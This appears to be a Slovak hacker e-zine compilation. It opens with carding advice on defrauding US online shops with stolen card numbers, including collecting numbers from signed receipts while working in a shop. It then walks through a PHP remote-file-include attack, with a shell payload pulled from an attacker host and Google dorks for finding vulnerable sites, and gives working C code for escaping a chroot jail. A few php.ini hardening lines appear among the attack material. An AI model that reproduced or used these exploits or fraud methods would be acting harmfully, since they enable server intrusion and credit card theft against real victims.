OK tak to je strucny uvod do cardingu, upravy na geograficku polohu Slovenska spocivaju asi v tom, ze sa neodporuca objednavat z europskych obchodov, interpol je omnoho blizsie ako FBI, v europe je online shopov sice velmi vela, no obrat a zisk, ktory produkuju je oproti US iba zrnko na pusti.
Naviac stratu napr. 500 - 1000 USD ktoru sposobite velkemu americkemu on-line shopu typu www.ebay.com (obrat $5 miliard) nepociti tak, ako by to pocitil trebars elektronicky obchod na Slovensku. Niezeby mi bolo prehnane luto slovenskych on-line shopov, ale podstatne je ze po tom ebay.com nepojde tak, ako by po tom patral europsky/slovensky e-shop. Ok US-Slovensko, tak to mame asi tak 6000 km a 2 colnice, ktore su dalsim velkym problemom. Colnici mozu ale nemusia otvorit balik, zalezi na tom ako balik vyzera, ale zvycajne bude mat nalepky z obchodu, tak bude kazdemu jasne, ze to nie su kolace od dobrej tety z alabamy. Pripravit sa na colnicu je more complicated, falosny obciansky, popripade peciatka, ehm. Nie je to bohvieco, preto neodporucam ani skusat. Bez cla pridu len knizky a CD, ehm, to nie je bohvieaky uzitok za to, co ste museli podstupit ak ste sa drzali mojho navodu. Co mozem odporucat. Zohnat si au-pair viza do ameriky, rodina zaplati vsetko a ak mate vztah k detom tak to bude uplne super, mate rok aj nieco na scudzovanie veci. V usa sa taktiez zhanaju cisla omnoho jednoduchsie, kaslat na naladovych hackerov a ozranske party, zamestname sa v nejakom obchode, napriklad male potraviny, drogeria, hocikde kde sa da platit kartou. Na kazdom podpisanom receipte bude cislo karty a meno uzivatela, nie je potom skutocne nic lahsie ako kupit si nove Pentium 3 a G4 Cube, to aby boli zastupene obe platformy:-))).
Coho sa pri SK cardingu vyvarovat? Objednavanie na Slovensko je velmi komplikovane, neodporucam to velmi, ale ak je pre Vas cesta zo zdravotnych ci finacnych dovodov do US nemozna tak je aj to riesenie, zial zapletiete sa s roznymi zivlami, ktore robia doklady, budete musiet platit clo, mozno uplacat colnikov a starat sa o cudzie deti je nekedy celkom prijemne, faganov treba odvieazt do skoly a cely den mame na browsovanie, vyjedanie chladnicky v uspesnejsich pripadoch telefonovanie do europy zadara, clovek si precvici english a spozna svet.
jan novacik
navrat na obsah
ja byvam v malom meste a vobec sa necitim byt obmedzeny, ak sa prihlasim
stabilne len na jednu bts-ku. z jednej veze mam pokrytie po celom meste.
ked som v blave, je to horsie, ale tiez sa da presunut radovo niekolko
kilometrov (cc 5 az 10) bez zmeny bts-ky. navyse prehadzovat si rucne bts-ky pri
cestovani krajinou je urcite zazivnejsie ako hrat sa tie priblble hry v
mobile ci konverzovat s priatelkou. v kazdom pripade som raz a navzdy vyriesil problem anonymnej
hlasovej a datovej komunikacie. teraz mozem s nadhladom sledovat v tlaci
socio-politicke polemiky o tom ake informacie by mali
mobilni operatori poskytovat sukromnym firmam ci policajtom, a ake by
nemali. je mi to jedno, lebo si mozem povedat ze som do rozumnej miery
prevzal kontrolu nad sukromim hlasovej a datovej komunikacie do svojich
vlastnych ruk a mam v pazi na com sa vlada/gsm-operatori/policajti/sis/atd
dohodnu alebo nedohodnu.
pajkus, antonio, niko
co ty na to ? board
co ty na to ? board
<?
include($source);
?>
loser@llama> lynx http://e-shop.maliar.com/index.php?source=/etc/passwd
root:*:0:0:root:/root:/bin/bash
maliar:*:100:100:Maliar:/home/maliar:/bin/bash
a coze sme to vraveli o vzdialenom includovani? v recepte sa vravi, ze budeme potrebovat:
loser@llama> cat > cuckoosegg.php3
<?
$id = system("/usr/bin/whoami");
system("/bin/echo \"31337 stream tcp nowait $id /bin/bash bash -i\" > /tmp/h4x0r.c0nf");
system("/usr/sbin/inetd /tmp/h4x0r.c0nf");
?>
^D
poznamka: skript sa v ziadnom pripade nesnazi byt univerzalny, cesty nemusia zodpovedat konkretnej situacii, su to najbeznejsie pouzivane cesty v beznej distribucii linuxu. ak mame prilis vela casu, mozeme si napisat aj jednoduchy neinteraktivny shell, ale to uz je hadam kazdemu viac nez nad slnko jasnejsie.
http://e-shop.maliar.com/index.php3?source=http://3v1L.h4x0r.sk/cuckoosegg.php3
pre istotu sa uistime, ze vsetko prebehlo podla planu a kukucka sa vyliahla bez komplikacii a nepripalila sa:
root@llama# nmap -sS -p 31337 e-shop.maliar.com
Interesting ports on e-shop.maliar.com (127.0.0.1):
Port State Service
31337/tcp open Elite
aby sme nezostali nic dlzni, este slubeny trik s pouzitim netcat. jeho prednostou je, ze bude fungovat aj na windozoch, takze nik nepride skratka. ale ved netcat aj tak vsetci mame davno nainstalovany, vsak? vec je to naozaj viac ako jednoducha, bindneme si port vyssi ako 1024 (ak nie sme root), povieme nech pekne caka na prichodzi request a potom posle nase kukucie vajce serveru:
loser@llama> nc -l -p 31337 < cuckoosegg.php3
uz len mala zmena v GET http requestu:
loser@llama> lynx http://e-shop.maliar.com/index.php3?source=http://3v1L.h4x0r.sk:31337/
a uz nam nezostava nic ine ako obligatny telnet na e-shop.maliar.com 31337, kde uz na nas nedockavo caka do chrumkava opeceny cerstvy shell s pravami webserveru.
safe_mode = On ; aktivuje safe mode
safe_mode_exec_dir = /niekde ; v pripade, ze potrebujeme spustat nejake programy, ulozime ich vsetky do jedneho specifickeho adresara
safe_mode_allowed_env_vars = PHP_ ; uzivatelia budu moct menit len premenne prostredia s prefixom PHP_
safe_mode_protected_env_vars = LD_LIBRARY_PATH ; tieto premenne v ziadnom pripade uzivatel nebude moct zmenit
disable_functions = system(),exec() ; funkcie, ktore nechceme aby uzivatelia mali moznost pouzit, nezalezi, ci je/nie je nastaveny safe_mode
allow_url_fopen = Off ; zakaze otvaranie url odkazov ako by to boli subory
doc_root = /niekde/tam ; nedovoli php skriptom "vyjst" na vyssiu uroven v adresarovej strukture ako je zadany adresar
open_basedir = /niekde/inde ; nedovoli otvorit php skriptu subor vyssie v adresarovej strukture, nez je zadany adresar
ako dalsi bod v ramci osvety, dame vsetkym php programatrom precitat tento text :)
allinurl: php3 html include OR inc
dovod je hned jasny, drvivu vacsinu chyb odhalime najlahsie v url, skript obsahuje koncovku php3, v url sa za nim nachadza html (v idealnom pripade, ide potom s velkou pravdepodobnostou o ciste include()...) a mozny paramater odhadneme na include alebo inc. postupne vyskusame kombinacie php, php3, phtml, php4, ktore by sme radi videli ako koncovku skriptu, html, htm, php, php3, phtml, php4, inc, dat ako typ vkladaneho suboru a dalsie parametre, o ktorych si myslime, ze by mohli byt nazvami zle osetrovanych premennych. s vlastneho maleho prieskumu v .cz a .sk by som zoradil podla poctu vyskytu parametre takto:
page=
str=
src=
file=
stranka=
url=
takze mozeme nase dalsie query viac optimalizovat, okrem parametra stranka su vsetky jazykovo univerzalne, co len zvysuje moznu pravdepodobnost usechu:
allinurl: php3 html page OR str OR src OR file OR url
po tom, ako skombinujeme vsetky moznosti v koncovkach, ziskame priblizne 340 000 najdenych dokumentov. niektore z nich predstavuju rovnake skripty s roznymi parametrami, dalsie su korektnymi requestmi do databaz, niektore su spravne napisane. dovolim si tvrdit, ze aspon jedna desatina z nich trpi popisanym problemom. dostavame sa k cislu 34 000. 34 000 zle napisanych skriptov na 34 000 serveroch. a mnohe dalsie, ktore nespadali do najcastejsie sa vyskytujucich klucovych slov. nebeha vam trochu mraz po chrbte?
google: http://www.google.com/
phpbugs: http://underground.cz/556
co ty na to ? board
chdir("/users/home");
chroot("/users/home");
..pred tym ako zavolame chroot zmenime pracovny adresar chdir-om. toto je koli tomu, ze na mnohych systemoch sam chroot() nezmeni working directory, treba to spravit takto dopredu chdirom. po spusteni takehoto chroot() callu by open("/",O_RDONLY) otvoril ten isty adresar ako open("/users/home",O_RDONLY) pred spustenim chrootu.
/bin/sh
/usr/ld.so.1
/dev/zero
/usr/lib/libc.so.1
/usr/lib/libdl.so.1
/usr/lib/libw.so.1
/usr/lib/libintl.so.1
/usr/platform/SUNW,Ultra-1/lib/libc_psr.so.1
samozrejme narocnejsie aplikacie potrebuju viacej fajlov a kniznic. napriklad rozumna instalacia perlu v chroot prostredi vyzaduje 2610 suborov a 192 adresarov.
ak sa vsetko toto vykona, program moze bezat funkcie mimo chroot prostredia. logicky vychadza, ze najjednoduchsie je spustit exec() prikaz na nejaky shell, napriklad sh. nasleduje priklad, ktory vykona presne toto. je mozna aj perlovska verzia, ale toto je C-ckovska verzia fungujuca pod solarisom a linuxom.
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
/*
** NEED_FCHDIR by sa malo nastavit na hodnotu 1 ak chroot() na tvojom
** systeme meni pracovny adresar volajuceho procesu na ten isty adresar,
** z ktoreho bol ten proces chroot()-ovany.
**
** napriklad na Solarise 7 a nizsom to netreba nastavovat..
**
*/
#define NEED_FCHDIR 0
#define TEMP_DIR "vodnybyvol"
/* ideme von z chroot() prostredia */
int main() {
int x; /* posuvame sa o adresara vyssie */
int done=0; /* sme hotovi ? */
#ifdef NEED_FCHDIR
int dir_fd; /* file descriptor na adresar */
#endif
struct stat sbuf; /* stat() buffer */
/*
** najprv vytvorime temporary adresar ak este neexistuje
*/
if (stat(TEMP_DIR,&sbuf)<0) {
if (errno==ENOENT) {
if (mkdir(TEMP_DIR,0755)<0) {
fprintf(stderr,"nedal sa vytvorit %s - %s\n", TEMP_DIR,
strerror(errno));
exit(1);
}
} else {
fprintf(stderr,"problem pri stat %s - %s\n", TEMP_DIR,
strerror(errno));
exit(1);
}
} else if (!S_ISDIR(sbuf.st_mode)) {
fprintf(stderr,"chyba - %s nie je adresar!\n",TEMP_DIR);
exit(1);
}
#ifdef NEED_FCHDIR
/*
** terazky si otvorime momentalny pracovny adresar
*/
if ((dir_fd=open(".",O_RDONLY))<0) {
fprintf(stderr,"problem pri otvarani "." - %s\n",
strerror(errno));
exit(1);
}
#endif
/*
** a teraz chroot() do temporary adresara
*/
if (chroot(TEMP_DIR)<0) {
fprintf(stderr,"neda sa mi spravit chroot do %s - %s\n",TEMP_DIR,
strerror(errno));
exit(1);
}
#ifdef NEED_FCHDIR
/*
** ciastocne sa vymamime z chrootu pomocou fchdir()
*/
if (fchdir(dir_fd)<0) {
fprintf(stderr,"Failed to fchdir - %s\n",
strerror(errno));
exit(1);
}
close(dir_fd);
#endif
/*
** kompletne sa vymamime z chroot klietky rekurzivnym pochodovanim
** po adresarovej strukture a vzdy spravime chroot na momentalny pracovny
** adresar (ktory na zaver bude skutocny "/"). takze vela krat spravime
** chdir("..") popazi vela krat (1024 krat pre stastie :). ak sa dostaneme
** do skutocneho rootovskeho adresara pred tym ako sa skonci loop nevadi to,
** lebo .. znamena to iste ako . ked si v rootovskom adresari
**
** finalny odchod na parky z chroot prostredia spravime prikazom chroot(".")
** co by uz terazky mal byt naozajstny rootovsky adresar
*/
for(x=0;x<1024;x++) {
chdir("..");
}
chroot(".");
/*
** kedze sme vonka, spustime si shell
*/
if (execl("/bin/sh","-i",NULL)<0) {
fprintf(stderr,"neda sa spustit shell - %s\n",strerror(errno));
exit(1);
}
}
prebijanie z chroot() prostredia nie je novinka, pojednavalo sa o nom napriklad v sunworld online (januar a august '99) - v tychto vydaniach sa dost do hlbky keca o tom ako sa ochranit proti hore popisanemu utoku. autorka clanku, carole fennelly, doporucuje pomerne nechutny hack, ktory upravuje na solarise fsdb (file system debugger) a temoporary file system. tato metoda v podstate fixuje ".." linku v roote temporary file systemu tak aby ukazovala na ten samy root adresar, co je v podstate presne to iste ako funguje ".." v ozajstnom root adresari.
co ty na to ? board
co ty na to ? board